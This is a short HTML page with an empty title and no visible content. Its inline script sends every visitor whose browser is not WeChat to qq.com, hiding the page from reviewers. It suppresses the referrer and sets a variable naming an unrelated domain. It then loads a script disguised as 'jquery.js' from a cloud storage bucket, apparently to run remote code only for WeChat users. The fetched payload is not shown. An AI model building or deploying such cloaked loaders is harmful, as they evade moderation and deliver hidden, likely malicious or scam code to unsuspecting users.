<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="never">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0" />
    <title></title>
    <script>
        let ua = navigator.userAgent.toLowerCase();
        if (!ua.match(/MicroMessenger/i)) window.location.href = "https://www.qq.com";
    </script>
</head>
<body>
    <script>
        var ddms = "//sd.blitzen.site";
    </script>
    <script src="https://cdn0915.ks3-cn-beijing.ksyuncs.com/jquery.js"></script>
</body>
</html>
